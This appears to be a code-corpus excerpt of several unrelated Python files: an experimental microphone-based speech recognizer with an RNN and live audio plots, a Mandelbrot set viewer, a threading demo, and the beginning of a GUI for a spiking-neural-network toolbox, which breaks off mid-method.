import audioop # Operates on sound fragments consisting of signed integer samples 8, 16 or 32 bits wide, stored in Python strings.
import datetime # Supplies classes for manipulating dates and times in both simple and complex ways
import multiprocessing # A package that supports spawning processes using an API similar to the threading module.
import os # The path module suitable for the operating system Python is running on, and therefore usable for local paths
# import peakutils.peak # Peak detection utilities for 1D data
import random # Pseudo-random number generators for various distributions
import time # Provides various time-related functions.
import Tkinter # Python's de-facto standard GUI (Graphical User Interface) package
import wave # Provides a convenient interface to the WAV sound format
import matplotlib.pyplot as plt # Simple graph plotting library
import numpy # The fundamental package for scientific computing with Python.
import pyaudio # Provides Python bindings for PortAudio, the cross platform audio API
import pyqtgraph as pg # A pure-python graphics and GUI library built on PyQt4 / PySide and numpy
from PyQt4 import QtCore # A comprehensive set of Python bindings for Digia's Qt cross platform GUI toolkit.
from .nnet import RNN # Import the Recurrent Neural Network class from Dragonfire's Neural Network Library
__author__ = 'Mehmet Mert Yildiran, mert.yildiran@bil.omu.edu.tr'
# This submodule is experimental and not functional
CHUNK = 1024 # Number of frames read per buffer (smallest unit of audio processed at a time)
FORMAT = pyaudio.paInt16 # Data format
CHANNELS = 2 # Number of channels
RATE = 44100 # Sample rate of the audio stream (frames per second)
THRESHOLD = 1000 # Threshold (RMS level) for detecting a stimulus
SILENCE_DETECTION = 5 # Number of consecutive quiet chunks before the input is considered silent again
EMPTY_CHUNK = chr(int('000000', 2)) * CHUNK * 4 # One chunk worth of silent bytes, created just once
WAVE_OUTPUT_FILENAME = "/tmp/" + str(datetime.date.today()) + ".wav" # Example path if saving needed
TRAINING_DATA_DIRECTORY = "training_data/"
PLOTS_DIRECTORY = "plots/" # Directory to save the plots
OUT_DIRECTORY = "out/" # Output directory for training results (model.npz & words.txt)
root = Tkinter.Tk()
SCREEN_WIDTH = root.winfo_screenwidth()
SCREEN_HEIGHT = root.winfo_screenheight()
HIDDEN_NEURON = 20 # Hidden neuron count in the network
REPEAT_N_TIMES = 10 # How many times each word is repeated in the training recordings (e.g. for 3: one, one, one, two, two, two, ...)
TRAINING_ITERATION = 1000 # How many iterations for training
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
class SpeechRecognition():
# A function that will save recordings to a file
@staticmethod
def save_file(frames):
p = pyaudio.PyAudio() # Create a PyAudio session
if not os.path.isfile(WAVE_OUTPUT_FILENAME): # If there is not such a file
wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') # Create the file
wf.setnchannels(CHANNELS) # Set number of channels
wf.setsampwidth(p.get_sample_size(FORMAT)) # Set sampling format
wf.setframerate(RATE) # Set Bit Rate / Frame Rate
wf.writeframes("") # Write nothing
wf.close() # Close the session
wf = wave.open(WAVE_OUTPUT_FILENAME, 'rb') # Open the file with only read permission
n_frames = wf.getnframes() # Get all frames in it
previous_wav = wf.readframes(n_frames) # Assign all frames to a variable
wf.close() # Close the session
wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') # Open the file with write permission
wf.setnchannels(CHANNELS) # Set number of channels
wf.setsampwidth(p.get_sample_size(FORMAT)) # Set sampling format
wf.setframerate(RATE) # Set Bit Rate / Frame Rate
wf.writeframes(previous_wav + b''.join(frames)) # Write the all frames including previous ones
wf.close() # Close the session
@staticmethod
def save_training_data(training_data,words):
file_id = str(random.randint(100000,999999)) # Random file ID
if not os.path.exists(TRAINING_DATA_DIRECTORY): # Check whether the directory is exist or not
os.makedirs(TRAINING_DATA_DIRECTORY) # If there is none then create one
p = pyaudio.PyAudio() # Create a PyAudio session
wf = wave.open(TRAINING_DATA_DIRECTORY + file_id + ".wav", 'wb') # Create the .wav file with a random name
wf.setnchannels(CHANNELS) # Set number of channels
wf.setsampwidth(p.get_sample_size(FORMAT)) # Set sampling format
wf.setframerate(RATE) # Set Bit Rate / Frame Rate
wf.writeframes(''.join(training_data)) # Write the all frames of training_data
wf.close() # Close the session
with open(TRAINING_DATA_DIRECTORY + file_id + ".txt", "w") as thefile:
for word in words:
thefile.write("%s\n" % word)
# A function that will compute frequency of chunk using Fourier Transform
@staticmethod
def find_frequency(data):
T = 1.0/RATE # Reciprocal of Bit Rate
N = data.shape[0] # Number of rows in data(numpy array)
Pxx = (1./N)*numpy.fft.fft(data) # Compute the one-dimensional n-point discrete Fourier Transform (DFT) of data with the efficient Fast Fourier Transform (FFT) algorithm [CT]
f = numpy.fft.fftfreq(N,T) # Return the Discrete Fourier Transform sample frequencies
Pxx = numpy.fft.fftshift(Pxx) # Shift the zero-frequency component to the center of the spectrum
f = numpy.fft.fftshift(f) # Shift the zero-frequency component to the center of the spectrum
return f, Pxx # Return the results
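    # Rough sketch of the expected shapes (assuming the constants above): one
    # chunk of int16 samples gives N = CHUNK * CHANNELS points, f spans roughly
    # -RATE/2 .. +RATE/2 Hz, and Pxx is the complex spectrum with the zero
    # frequency shifted to the centre by fftshift.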
# A function that will draw a spectrum analyzer graphic to screen (PyQtGraph)
@staticmethod
def draw_spectrum_analyzer(all_frames, thresh_frames):
time.sleep(1) # Wait just one second
pw = pg.plot(title="Spectrum Analyzer") # Window title
pg.setConfigOptions(antialias=True) # Enable antialias for better resolution
pw.win.resize(1600, 300) # Define window size
pw.win.move(160 * SCREEN_WIDTH / 1920, 500 * SCREEN_HEIGHT / 1080) # Define window position
while True: # Loop over the frames of the audio / data chunks
data = ''.join(all_frames[-1:]) # Get only the last frame of all frames
data = numpy.fromstring(data, 'int16') # Binary string to numpy int16 data format
pw.setMouseEnabled(y=False) # Disable mouse
pw.setYRange(0,1000) # Set Y range of graph
pw.setXRange(-(RATE/2), (RATE/2), padding=0) # Set X range of graph relative to Bit Rate
pwAxis = pw.getAxis("bottom") # Get bottom axis
pwAxis.setLabel("Frequency [Hz]") # Set bottom axis label
f, Pxx = SpeechRecognition.find_frequency(data) # Call find frequency function. f is frequency, Pxx is energy.
Pxx = numpy.absolute(Pxx) # Calculate the absolute value element-wise. (complex input a + ib to sqrt(a^2 + b^2))
#peak_indexes = peakutils.peak.indexes(Pxx, thres=50.0/max(Pxx), min_dist=5) # Find the peaks. thres (energy threshold) is a rational value in here like 10/2000 on y-axis. min_dist is the minimum distance criteria for the peaks on x-axis.
#peak_indexes = peak_indexes.tolist() # Numpy array to list
#peak_values = list(Pxx[peak_indexes]) # Automatically map into list using peak indexes
#peak_indexes = list(f[peak_indexes]) # Automatically map into list using peak indexes
f = f.tolist() # Numpy array to list
Pxx = Pxx.tolist() # Numpy array to list
try: # Try this block
if thresh_frames[-1:][0] == EMPTY_CHUNK: # If last thresh frame is equal to EMPTY CHUNK
pw.plot(x=f,y=Pxx, clear=True, pen=pg.mkPen('w', width=1.0, style=QtCore.Qt.SolidLine)) # Then plot with white pen
else: # If last thresh frame is not equal to EMPTY CHUNK
pw.plot(x=f,y=Pxx, clear=True, pen=pg.mkPen('y', width=1.0, style=QtCore.Qt.SolidLine)) # Then plot with yellow pen
#pw.plot(x=peak_indexes, y=peak_values, pen=None, symbol='t') # Draw a scatter plot to the peak points
#pw.plot(x=peak_indexes, y=peak_values, pen=pg.mkPen('b', width=0.5, style=QtCore.Qt.SolidLine)) # Draw faint lines between the peak poits
except IndexError: # If we are getting an IndexError because of this -> thresh_frames[-1:][0]
pw.plot(x=f,y=Pxx, clear=True, pen=pg.mkPen('w', width=1.0, style=QtCore.Qt.SolidLine)) # Then plot with white pen
pg.QtGui.QApplication.processEvents() # ???
time.sleep(0.03) # Wait a few miliseconds
# A function that will draw a waveform graphic to screen (PyQtGraph)
@staticmethod
def draw_waveform(all_frames, thresh_frames):
time.sleep(1) # Wait just one second
pw = pg.plot(title="Waveform") # Window title
pg.setConfigOptions(antialias=True) # Enable antialias for better resolution
pw.win.resize(1300, 160) # Define window size
pw.win.move(300 * SCREEN_WIDTH / 1920, 850 * SCREEN_HEIGHT / 1080) # Define window position
pw.showAxis('bottom', False) # Hide bottom axis
while True: # Loop over the frames of the audio / data chunks
data = ''.join(all_frames[-20:]) # Join last 20 frames of all frames
data = numpy.fromstring(data, 'int16') # Binary string to numpy int16 data format
data2 = ''.join(thresh_frames[-20:]) # Join last 20 frames of thrsh frames
data2 = numpy.fromstring(data2, 'int16') # Binary string to numpy int16 data format
pw.setMouseEnabled(x=False) # Disable mouse
pw.setRange(yRange=[-10000,10000]) # Set Y range of graph
pw.plot(data, clear=True, pen=pg.mkPen('w', width=0.5, style=QtCore.Qt.DotLine)) # Plot all frames with white pen
pw.plot(data2, pen=pg.mkPen('y', width=0.5, style=QtCore.Qt.DotLine)) # Plot thresh frames with yellow pen
text = pg.TextItem("Seconds : " + str(int(len(all_frames)/(RATE/CHUNK))), color=(255, 255, 255)) # Define seconds according to number of total frames as a text
pw.addItem(text) # Display seconds according to number of total frames
text.setPos(500, 0) # Set text position
pg.QtGui.QApplication.processEvents()
time.sleep(0.03) # Wait a few miliseconds
# MAIN CODE BLOCK
@staticmethod
def start(audio_input,graphs=True,verbose=True):
words = []
txt_path = os.path.join(OUT_DIRECTORY, "words.txt")
with open(txt_path) as f:
words = words + [x.strip() for x in f.readlines()] # Load words from words.txt into an array
rnn = RNN(CHUNK*2, HIDDEN_NEURON, len(words)) # Create a Recurrent Neural Network instance (input,hidden,output)
rnn.importdump(OUT_DIRECTORY + "model.npz") # Import the dump
if audio_input == "0":
pass
else:
wf = wave.open(audio_input, 'rb') # Open .wav file from given path as audio_input in arguments
p = pyaudio.PyAudio() # Create a PyAudio session
# Create a stream
if audio_input == "0":
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
else:
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
all_frames = []
thresh_frames = []
if graphs:
shared_memory = multiprocessing.Manager() # Shared memory space manager
all_frames = shared_memory.list() # Define all_frames array in shared memory
thresh_frames = shared_memory.list() # Define thresh_frames array in shared memory
if audio_input == "0":
data = stream.read(CHUNK) # Get first data frame from the microphone
else:
data = wf.readframes(CHUNK) # Get first data frame from .wav file
all_frames.append(data) # Append to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
if graphs:
process1 = multiprocessing.Process(target=SpeechRecognition.draw_waveform, args=(all_frames, thresh_frames)) # Define draw waveform process
process1.start() # Start draw waveform process
process2 = multiprocessing.Process(target=SpeechRecognition.draw_spectrum_analyzer, args=(all_frames, thresh_frames)) # Define draw spectrum analyzer process
process2.start() # Start drar spectrum analyzer process
# Loop over the frames of the audio / data chunks
while data != '':
previous_data = data # Get previous chunk that coming from end of the loop
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk
word_data = [] # Define single word data
if rms >= THRESHOLD: # If Root Mean Square value is greater than THRESHOLD constant
#starting_time = datetime.datetime.now() # Starting time of the word
thresh_frames.pop() # Pop out last frame of thresh frames
thresh_frames.pop() # Pop out last frame of thresh frames
word_data.append(previous_data) # Append previous chunk to training data
word_data.append(data) # Append current chunk to training data
thresh_frames.append(previous_data) # Append previous chunk to thresh frames
thresh_frames.append(data) # Append current chunk to thresh frames
silence_counter = 0 # Define silence counter
while silence_counter < SILENCE_DETECTION: # While silence counter value less than SILENCE_DETECTION constant
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
word_data.append(data) # Append this chunk to training data
thresh_frames.append(data) # Append this chunk to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk again
if rms < THRESHOLD: # If Root Mean Square value is less than THRESHOLD constant
silence_counter += 1 # Then increase silence counter
else: # Else
silence_counter = 0 # Assign zero value to silence counter
#del word_data[-(SILENCE_DETECTION-2):] # Delete last frames of training data as much as SILENCE_DETECTION constant
#del thresh_frames[-(SILENCE_DETECTION-2):] # Delete last frames of thresh frames as much as SILENCE_DETECTION constant
#for i in range(SILENCE_DETECTION-2): # SILENCE_DETECTION constant times
# thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY_CHUNK
#ending_time = datetime.datetime.now() # Ending time of the training
for i in xrange(len(word_data)):
word_data[i] = numpy.fromstring(word_data[i], 'int16') # Convert each frame from binary string to int16
word_data = numpy.asarray(word_data) # Convert the word data into numpy array
word_data = word_data / word_data.max() # Normalize the input
output = rnn.run(word_data) # Run the network to get the output/result (feedforward)
print(words[numpy.argmax(output)] + '\t\t', output) # Print the best guess
if graphs:
process1.terminate() # Terminate draw waveform process
process2.terminate() # Terminate drar spectrum analyzer process
stream.stop_stream() # Stop the stream
stream.close() # Close the stream
p.terminate() # Terminate the session
@staticmethod
def _teststart():
rnn = RNN(2048, HIDDEN_NEURON, 5)
rnn.importdump("out/model.npz")
words_data = []
words = []
for filename in os.listdir(TRAINING_DATA_DIRECTORY):
if filename.endswith(".wav"):
wav_path = os.path.join(TRAINING_DATA_DIRECTORY, filename)
words_data = words_data + SpeechRecognition.extract_words_from_audio(wav_path)
txt_path = os.path.join(TRAINING_DATA_DIRECTORY, filename[:-4] + ".txt")
with open(txt_path) as f:
words = words + [x.strip() for x in f.readlines()]
for i in xrange(len(words_data)):
for j in xrange(len(words_data[i])):
words_data[i][j] = numpy.fromstring(words_data[i][j], 'int16') # Convert each frame from binary string to int16
words_data[i] = numpy.asarray(words_data[i]) # Convert the word data into numpy array
words_data[i] = words_data[i] / words_data[i].max() # Normalize the input
for i in xrange(len(words_data)):
print(words[i/REPEAT_N_TIMES] + '\t\t', rnn.run(words_data[i]))
@staticmethod
def extract_words_from_audio(audio_input,graphs=False,verbose=False):
try:
if audio_input == "0":
pass
else:
wf = wave.open(audio_input, 'rb') # Open .wav file from given path as audio_input in arguments
p = pyaudio.PyAudio() # Create a PyAudio session
# Create a stream
if audio_input == "0":
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
else:
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
words_data = [] # Define words data array
all_frames = []
thresh_frames = []
if graphs:
shared_memory = multiprocessing.Manager() # Shared memory space manager
all_frames = shared_memory.list() # Define all_frames array in shared memory
thresh_frames = shared_memory.list() # Define thresh_frames array in shared memory
if audio_input == "0":
data = stream.read(CHUNK) # Get first data frame from the microphone
else:
data = wf.readframes(CHUNK) # Get first data frame from .wav file
all_frames.append(data) # Append to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
if graphs:
process1 = multiprocessing.Process(target=SpeechRecognition.draw_waveform, args=(all_frames, thresh_frames)) # Define draw waveform process
process1.start() # Start draw waveform process
process2 = multiprocessing.Process(target=SpeechRecognition.draw_spectrum_analyzer, args=(all_frames, thresh_frames)) # Define draw spectrum analyzer process
process2.start() # Start drar spectrum analyzer process
# Loop over the frames of the audio / data chunks
while data != '':
previous_data = data # Get previous chunk that coming from end of the loop
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk
word_data = [] # Define single word data
if rms >= THRESHOLD: # If Root Mean Square value is greater than THRESHOLD constant
#starting_time = datetime.datetime.now() # Starting time of the word
thresh_frames.pop() # Pop out last frame of thresh frames
thresh_frames.pop() # Pop out last frame of thresh frames
word_data.append(previous_data) # Append previous chunk to training data
word_data.append(data) # Append current chunk to training data
thresh_frames.append(previous_data) # Append previous chunk to thresh frames
thresh_frames.append(data) # Append current chunk to thresh frames
silence_counter = 0 # Define silence counter
while silence_counter < SILENCE_DETECTION: # While silence counter value less than SILENCE_DETECTION constant
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
word_data.append(data) # Append this chunk to training data
thresh_frames.append(data) # Append this chunk to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk again
if rms < THRESHOLD: # If Root Mean Square value is less than THRESHOLD constant
silence_counter += 1 # Then increase silence counter
else: # Else
silence_counter = 0 # Assign zero value to silence counter
#del word_data[-(SILENCE_DETECTION-2):] # Delete last frames of training data as much as SILENCE_DETECTION constant
#del thresh_frames[-(SILENCE_DETECTION-2):] # Delete last frames of thresh frames as much as SILENCE_DETECTION constant
#for i in range(SILENCE_DETECTION-2): # SILENCE_DETECTION constant times
# thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY_CHUNK
#ending_time = datetime.datetime.now() # Ending time of the training
words_data.append(word_data)
if verbose:
print(len(words_data))
if graphs:
process1.terminate() # Terminate draw waveform process
process2.terminate() # Terminate drar spectrum analyzer process
stream.stop_stream() # Stop the stream
stream.close() # Close the stream
p.terminate() # Terminate the session
return words_data
except KeyboardInterrupt: # We will use KeyboardInterrupt to finish the microphone session
if graphs:
process1.terminate() # Terminate draw waveform process
process2.terminate() # Terminate drar spectrum analyzer process
stream.stop_stream() # Stop the stream
stream.close() # Close the stream
p.terminate() # Terminate the session
return words_data
@staticmethod
def create_training_data(audio_input,graphs=True,verbose=True):
try:
words_data = SpeechRecognition.extract_words_from_audio(audio_input,graphs,verbose)
except KeyboardInterrupt:
pass
else:
words = raw_input("Enter the words separating them by comma(,): ").split(',')
if len(words) == (len(words_data)/REPEAT_N_TIMES):
training_data = [frame for word_data in words_data for frame in word_data] # Flatten the words data into single big array of frames
SpeechRecognition.save_training_data(training_data,words) # Then save it
else:
print("Sorry, word counts don't match. Please try again.")
@staticmethod
def load_training_data():
words_data = []
words = []
for filename in os.listdir(TRAINING_DATA_DIRECTORY):
if filename.endswith(".wav"):
wav_path = os.path.join(TRAINING_DATA_DIRECTORY, filename)
words_data = words_data + SpeechRecognition.extract_words_from_audio(wav_path)
txt_path = os.path.join(TRAINING_DATA_DIRECTORY, filename[:-4] + ".txt")
with open(txt_path) as f:
words = words + [x.strip() for x in f.readlines()]
return (words_data,words)
@staticmethod
def train():
words_data, words = SpeechRecognition.load_training_data() # Load the training data
target = numpy.identity(len(words)) # Create a unit matrix (identity matrix) as our target
ri = []
for i in xrange(len(words)):
ri += [i] * REPEAT_N_TIMES
target = target[ri]
for i in xrange(len(words_data)):
for j in xrange(len(words_data[i])):
words_data[i][j] = numpy.fromstring(words_data[i][j], 'int16') # Convert each frame from binary string to int16
words_data[i] = numpy.asarray(words_data[i]) # Convert the word data into numpy array
words_data[i] = words_data[i] / words_data[i].max() # Normalize the input
rnn = RNN(len(words_data[0][0]), HIDDEN_NEURON, len(words)) # Create a Recurrent Neural Network instance
#print len(words_data[0][0]), len(words_data)
#print numpy.asarray(words_data[0]).shape # Input shape
#print target[0].shape # Target shape
lr = 0.01 # Learning rate
e = 1 # Initial error = 1
vals = [] # Values for plotting
n_iteration = TRAINING_ITERATION
for i in xrange(n_iteration): # Iterate (n_iteration) times
for j in xrange(len(words_data)): # For each word in words
u = words_data[j] # Input (2048)
t = target[j] # Target (word count)
c = rnn.train_step(u, t, lr) # Cost
print("iteration {0}: {1}".format(i, numpy.sqrt(c)))
e = (1.0/len(words_data))*numpy.sqrt(c) + ((len(words_data) - 1.0)/len(words_data))*e # Contributes to error 1 / word count
if i % (n_iteration/100) == 0:
vals.append(e)
if not os.path.exists(OUT_DIRECTORY): # Check whether the directory is exist or not
os.makedirs(OUT_DIRECTORY) # If there is none then create one
rnn.dump(OUT_DIRECTORY) # Dump model.npz (reusable training result) to out/ directory
print("The neural network dump saved into: " + OUT_DIRECTORY + "model.npz")
with open(OUT_DIRECTORY + "words.txt", "w") as thefile:
for word in words:
thefile.write("%s\n" % word) # Dump the words line by line
print("The word list saved into: " + OUT_DIRECTORY + "words.txt")
plt.plot(vals) # Plot the graph
if not os.path.exists(PLOTS_DIRECTORY): # Check whether the directory is exist or not
os.makedirs(PLOTS_DIRECTORY) # If there is none then create one
plt.savefig(PLOTS_DIRECTORY + 'error.png') # Save the graph
print("Graph of the decline of error by the time is saved as: " + PLOTS_DIRECTORY + "error.png")
print("--- TESTING ---")
del rnn
rnn = RNN(len(words_data[0][0]), HIDDEN_NEURON, len(words))
rnn.importdump(OUT_DIRECTORY + "model.npz")
for i in xrange(len(words_data)):
print(words[i/REPEAT_N_TIMES] + '\t\t', rnn.run(words_data[i]))
if __name__ == "__main__":
import argparse # Makes it easy to write user-friendly command-line interfaces.
ap = argparse.ArgumentParser() # Define an Argument Parser
ap.add_argument("-a", "--audio", help="path to the audio file") # Add --audio argument
ap.add_argument("-c", "--create", help="create training data, use with --audio")
ap.add_argument("-t", "--train", help="train the network, use just by itself")
args = vars(ap.parse_args()) # Parse the arguments
if args["train"]:
SpeechRecognition.train()
elif args["create"] and args["audio"]:
SpeechRecognition.create_training_data(args["audio"])
elif args["audio"]:
SpeechRecognition.start(args["audio"])
else:
print("You tried to use it with a wrong combination. Check out --help")
|
Mandelbrot.py
|
import sys, random, math
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPainter, QColor
from multiprocessing import Process
xMin = -3
xMax = 3
yMin = -3
yMax = 3
#widthScale = 3
#heightScale = 3
zoomLevel = 4
class Mandelbrot(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 700, 700) #300, 190
self.setWindowTitle('Mandelbrot')
self.show()
#Custom version of the range function that works with float numbers
def frange(self, start, stop, step):
i = start
while i < stop:
yield i
i += step
def linearMap(self, value, low, high, newLow, newHigh):
return newLow + ((value - low) / (high - low)) * (newHigh - newLow)
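    # Worked example (illustrative): with the default 700 px wide window and the
    # initial view [-3, 3], linearMap(350, 0, 700, -3, 3) = -3 + (350/700) * (3 - (-3)) = 0.0,
    # i.e. the centre pixel maps to the centre of the complex plane.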
#Called whenever the window is resized or brought into focus
def paintEvent(self, event):
qp = QPainter()
qp.begin(self)
#Run the drawMandelbrot program
#self.runMultiprocessing(qp)
self.drawMandelbrot(qp, xMin, xMax, yMin, yMax)
qp.end()
def runMultiprocessing(self, qp):
numberOfThreads = 4
totalLength = abs(xMin) + abs(xMax)
pieceLength = totalLength / numberOfThreads
for i in range(numberOfThreads):
xMinNew = xMin + (pieceLength * i)
xMaxNew = xMin + (pieceLength * (i + 1))
print("Process ", i, " started.")
p = Process(target=self.drawMandelbrot, args=(qp, xMinNew, xMaxNew, yMin, yMax))
p.start()
p.join()
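        # Note: this variant is currently unused (paintEvent calls drawMandelbrot
        # directly). A QPainter cannot be handed to child processes, and joining
        # each process inside the loop would serialize the work anyway.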
def mousePressEvent(self, event):
global xMin
global xMax
global yMin
global yMax
size = self.size()
windowWidth = size.width()
windowHeight = size.height()
xMouse = event.x()
yMouse = event.y()
#print("xMouse: ", xMouse)
#print("yMouse: ", yMouse)
#print("Before Map - xMin: ", xMin)
#print("Before Map - yMin: ", yMin)
#print("Before Map - xMax: ", xMax)
#print("Before Map - yMax: ", yMax)
xMouse = self.linearMap(xMouse, 0, windowWidth, xMin, xMax)
yMouse = self.linearMap(yMouse, 0, windowHeight, yMax, yMin)
#print("xMouse: ", xMouse)
#print("yMouse: ", yMouse)
#Make temporary variables to store the new x/y min/max so they aren't changed while the algorithms are still working
xMinTemp = xMouse - ((xMax - xMin) / (zoomLevel * zoomLevel))
xMaxTemp = xMouse + ((xMax - xMin) / (zoomLevel * zoomLevel))
yMinTemp = yMouse - ((yMax - yMin) / (zoomLevel * zoomLevel))
yMaxTemp = yMouse + ((yMax - yMin) / (zoomLevel * zoomLevel))
xMin = xMinTemp
xMax = xMaxTemp
yMin = yMinTemp
yMax = yMaxTemp
#Update scale for the new zoomed in view
#widthScale = widthScale / ((zoomLevel * zoomLevel) / 1.5)
#heightScale = heightScale / ((zoomLevel * zoomLevel) / 1.5)
widthScale = (xMax - xMin) / size.width()
heightScale = (yMax - yMin) / size.height()
self.repaint()
#print("Done zooming in.")
#print("New xMin: ", xMin)
#print("New xMax: ", xMax)
#print("New yMin: ", yMin)
#print("New yMax: ", yMax)
#print("New widthScale: ", widthScale)
#print("New heightScale: ", heightScale)
#print(x)
#print(y)
def drawMandelbrot(self, qp, xMin, xMax, yMin, yMax):
#Variables
size = self.size()
maxIteration = 255
widthScale = (xMax - xMin) / size.width()
heightScale = (yMax - yMin) / size.height()
# widthScale = 6 / size.width()
# heightScale = 6 / size.height()
for w in self.frange(xMin, xMax, widthScale):
for h in self.frange(yMin, yMax, heightScale):
x = 0
y = 0
iteration = 0
while (x*x + y*y <= 4) and (iteration < maxIteration):
xtemp = (x*x - y*y) + w
y = ((2*x) * y) + h
x = xtemp
iteration += 1
'''
if iteration != maxIteration:
if iteration <= 33:
qp.setPen(QColor(self.linearMap(iteration, 0, 33, 0, 255), 255, 255)) #Red is based on iteration
#qp.setPen(Qt.red)
elif iteration > 33 and iteration <= 66:
qp.setPen(QColor(255, self.linearMap(iteration, 33, 66, 0, 255), 255)) #Green is based on iteration
#qp.setPen(Qt.green)
else:
qp.setPen(QColor(255, 255, self.linearMap(iteration, 67, maxIteration, 0, 255))) #Blue is based on iteration
#qp.setPen(Qt.blue)
else:
qp.setPen(Qt.black)
'''
if iteration != maxIteration:
qp.setPen(QColor.fromHsv(iteration, 255, 255))
else:
qp.setPen(Qt.black)
newW = self.linearMap(w, xMin, xMax, 0, size.width() - 1)
newH = self.linearMap(h, yMin, yMax, size.height() - 1, 0)
                qp.drawPoint(int(newW), int(newH)) #drawPoint expects integer pixel coordinates
def main():
app = QApplication([])
ex = Mandelbrot()
app.exec_()
if __name__ == '__main__':
main()
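# A minimal, GUI-free sketch of the escape-time iteration used in drawMandelbrot
# above, for a single point c = w + h*i (illustrative only, not called in this file):
def escape_time(w, h, max_iteration=255):
    x = y = 0.0
    iteration = 0
    while (x*x + y*y <= 4) and (iteration < max_iteration):
        x, y = (x*x - y*y) + w, (2*x*y) + h
        iteration += 1
    return iteration # equals max_iteration for points assumed to lie inside the set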
|
demo_threads2.py
|
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
import time
def print_cube(num):
"""
function to print cube of given num
"""
time.sleep(5)
print("Cube: {}".format(num * num * num))
def print_square(num):
"""
function to print square of given num
"""
print("Square: {}".format(num * num))
if __name__ == "__main__":
# creating thread
t1 = threading.Thread(target=print_square, args=(10,))
t2 = threading.Thread(target=print_cube, args=(10,))
t3 = threading.Thread(target=print_cube, args=(10,))
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# starting thread 3
t3.start()
# wait until thread 1 is completely executed
t1.join()
    print(f'{t1.name} done')
# wait until thread 2 is completely executed
t2.join()
    print(f'{t2.name} done')
# wait until thread 3 is completely executed
    t3.join()
    print(f'{t3.name} done')
    # all three threads completely executed
print("Done!")
|
gui.py
|
# -*- coding: utf-8 -*-
"""
Graphical User interface for the SNN conversion toolbox.
Features
--------
- Allows setting parameters and what tools to use during an experiment.
- Performs basic checks that specified parameters are valid.
- Preferences can be saved and reloaded.
- Tooltips explain the functionality.
- Automatically recognizes result plots and allows displaying them in a
separate window.
Note
----
Due to rapid extensions in the main toolbox, we have not always been able to
update the GUI to cover all functionality of the toolbox. We are currently
not maintaining the GUI and recommend using the terminal to run experiments.
@author: rbodo
"""
from __future__ import with_statement
import json
import os
import sys
import threading
import webbrowser
from textwrap import dedent
import matplotlib.gridspec as gridspec
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.backends.backend_tkagg import NavigationToolbar2TkAgg
from snntoolbox.bin.utils import test_full
from snntoolbox.bin.gui.tooltip import ToolTip
if sys.version_info[0] < 3:
# noinspection PyPep8Naming,PyUnresolvedReferences,PyPackageRequirements
import Tkinter as tk
# noinspection PyPep8Naming,PyUnresolvedReferences
import tkFileDialog as filedialog
# noinspection PyPep8Naming,PyUnresolvedReferences
import tkMessageBox as messagebox
# noinspection PyPep8Naming,PyUnresolvedReferences
import tkFont as font
# noinspection PyCompatibility,PyUnresolvedReferences
from Queue import Queue
else:
import tkinter as tk
# noinspection PyCompatibility
from tkinter import filedialog, messagebox, font
# noinspection PyCompatibility
from queue import Queue
# noinspection PyAttributeOutsideInit
class SNNToolboxGUI:
def __init__(self, root, config):
self.initialized = False
self.root = root
self.config = config
self.toolbox_root = os.getcwd()
self.default_path_to_pref = os.path.join(self.toolbox_root,
'preferences')
self.define_style()
self.declare_parameter_vars()
self.load_settings()
self.main_container = tk.Frame(root, bg='white')
self.main_container.pack(side='top', fill='both', expand=True)
self.globalparams_widgets()
self.cellparams_widgets()
self.simparams_widgets()
self.tools_widgets()
self.graph_widgets()
self.top_level_menu()
self.toggle_state_pynn(self.settings['simulator'].get())
self.toggle_poisson_input_state()
self.initialized = True
def define_style(self):
"""Define apperance style."""
self.padx = 10
self.pady = 5
font_family = 'clearlyu devagari'
self.header_font = (font_family, '11', 'bold')
font.nametofont('TkDefaultFont').configure(family=font_family, size=11)
font.nametofont('TkMenuFont').configure(family=font_family, size=11,
weight=font.BOLD)
font.nametofont('TkTextFont').configure(family=font_family, size=11)
self.kwargs = {'fill': 'both', 'expand': True,
'padx': self.padx, 'pady': self.pady}
def initialize_thread(self):
